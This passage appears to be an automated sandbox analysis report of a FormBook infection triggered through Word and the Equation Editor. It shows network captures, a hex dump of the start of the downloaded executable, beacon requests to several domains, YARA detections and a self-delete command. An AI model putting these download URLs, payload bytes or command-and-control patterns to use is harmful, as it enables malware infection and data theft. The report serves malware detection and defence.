Nov 25, 2021 18:08:39.452650070 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.452728033 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.452769041 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.480346918 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.480376005 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.480406046 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.480436087 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.485872030 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.485944986 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.513463020 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.513494015 CET  80           49165      37.0.9.166    192.168.2.22
Nov 25, 2021 18:08:39.513536930 CET  49165        80         192.168.2.22  37.0.9.166
Nov 25, 2021 18:08:39.513566971 CET  49165        80         192.168.2.22  37.0.9.166

                                                            UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 25, 2021 18:08:39.086638927 CET  52167        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:08:39.124274969 CET  53           52167      8.8.8.8       192.168.2.22
Nov 25, 2021 18:10:26.811336994 CET  57805        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:10:26.902570963 CET  53           57805      8.8.8.8       192.168.2.22
Nov 25, 2021 18:10:31.908102989 CET  59030        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:10:31.964771032 CET  53           59030      8.8.8.8       192.168.2.22
Nov 25, 2021 18:10:37.156733990 CET  59185        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:10:37.213021040 CET  53           59185      8.8.8.8       192.168.2.22
Nov 25, 2021 18:10:42.365734100 CET  55616        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:10:42.420614958 CET  53           55616      8.8.8.8       192.168.2.22
Nov 25, 2021 18:10:48.059755087 CET  49972        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:10:48.129635096 CET  53           49972      8.8.8.8       192.168.2.22

                                                            DNS Queries

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
Nov 25, 2021 18:08:39.086638927 CET  192.168.2.22  8.8.8.8  0x2206    Standard query (0)  dell-tv.tk                   A (IP address)  IN (0x0001)
Nov 25, 2021 18:10:26.811336994 CET  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.bandhancustomer.com      A (IP address)  IN (0x0001)
Nov 25, 2021 18:10:31.908102989 CET  192.168.2.22  8.8.8.8  0x9c63    Standard query (0)  www.texaszephyr.com          A (IP address)  IN (0x0001)
Nov 25, 2021 18:10:37.156733990 CET  192.168.2.22  8.8.8.8  0x30e0    Standard query (0)  www.publicfigure.skin        A (IP address)  IN (0x0001)
Nov 25, 2021 18:10:42.365734100 CET  192.168.2.22  8.8.8.8  0x9037    Standard query (0)  www.volunteervabetweenk.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:10:48.059755087 CET  192.168.2.22  8.8.8.8  0xce43    Standard query (0)  www.1oavyx.com               A (IP address)  IN (0x0001)

                                                            DNS Answers

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code      Name                         CName              Address         Type                    Class
Nov 25, 2021 18:08:39.124274969 CET  8.8.8.8    192.168.2.22  0x2206    No error (0)    dell-tv.tk                                      37.0.9.166      A (IP address)          IN (0x0001)
Nov 25, 2021 18:10:31.964771032 CET  8.8.8.8    192.168.2.22  0x9c63    No error (0)    www.texaszephyr.com          texaszephyr.com                    CNAME (Canonical name)  IN (0x0001)
Nov 25, 2021 18:10:31.964771032 CET  8.8.8.8    192.168.2.22  0x9c63    No error (0)    texaszephyr.com                                 34.102.136.180  A (IP address)          IN (0x0001)
Nov 25, 2021 18:10:37.213021040 CET  8.8.8.8    192.168.2.22  0x30e0    No error (0)    www.publicfigure.skin        publicfigure.skin                  CNAME (Canonical name)  IN (0x0001)
Nov 25, 2021 18:10:37.213021040 CET  8.8.8.8    192.168.2.22  0x30e0    No error (0)    publicfigure.skin                               34.102.136.180  A (IP address)          IN (0x0001)
Nov 25, 2021 18:10:42.420614958 CET  8.8.8.8    192.168.2.22  0x9037    No error (0)    www.volunteervabetweenk.com                     172.67.184.102  A (IP address)          IN (0x0001)
Nov 25, 2021 18:10:42.420614958 CET  8.8.8.8    192.168.2.22  0x9037    No error (0)    www.volunteervabetweenk.com                     104.21.32.75    A (IP address)          IN (0x0001)
Nov 25, 2021 18:10:48.129635096 CET  8.8.8.8    192.168.2.22  0xce43    Name error (3)  www.1oavyx.com               none               none            A (IP address)          IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • dell-tv.tk
                                                            • www.texaszephyr.com
                                                            • www.publicfigure.skin
                                                            • www.volunteervabetweenk.com

                                                            HTTP Packets

Session ID: 0  Source IP: 192.168.2.22  Source Port: 49165  Destination IP: 37.0.9.166  Destination Port: 80  Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 18:08:39.172686100 CET  0                   OUT        GET /ashlyzx.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: dell-tv.tk
                                                            Connection: Keep-Alive
Nov 25, 2021 18:08:39.202337980 CET  2                   IN         HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 25 Nov 2021 17:08:39 GMT
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 560128
                                                            Last-Modified: Thu, 25 Nov 2021 01:30:41 GMT
                                                            Connection: keep-alive
                                                            ETag: "619ee741-88c00"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 
00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0 @ @Op H.textt `.rsrcp@@.reloc@BHH!dj`4s}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()ow


Session ID: 1  Source IP: 192.168.2.22  Source Port: 49167  Destination IP: 34.102.136.180  Destination Port: 80  Process: C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 18:10:31.987536907 CET  593                 OUT        GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1
                                                            Host: www.texaszephyr.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Nov 25, 2021 18:10:32.106173992 CET  593                 IN         HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 2  Source IP: 192.168.2.22  Source Port: 49168  Destination IP: 34.102.136.180  Destination Port: 80  Process: C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 18:10:37.240250111 CET  594                 OUT        GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1
                                                            Host: www.publicfigure.skin
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Nov 25, 2021 18:10:37.357868910 CET  594                 IN         HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 3  Source IP: 192.168.2.22  Source Port: 49169  Destination IP: 172.67.184.102  Destination Port: 80  Process: C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 18:10:42.459754944 CET  595                 OUT        GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1
                                                            Host: www.volunteervabetweenk.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
Nov 25, 2021 18:10:43.044056892 CET  596                 IN         HTTP/1.1 404 Not Found
                                                            Date: Thu, 25 Nov 2021 17:10:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Accept-Encoding
                                                            cache-control: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6b3c7df37c1c4230-AMS
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior


                                                            System Behavior

                                                            General

                                                            Start time:18:08:15
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f150000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:18:08:17
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:18:08:24
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:18:08:25
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:18:08:28
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:18:08:41
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmstp.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                            Imagebase:0x110000
                                                            File size:84992 bytes
                                                            MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:18:08:45
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
                                                            Imagebase:0x4aac0000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis
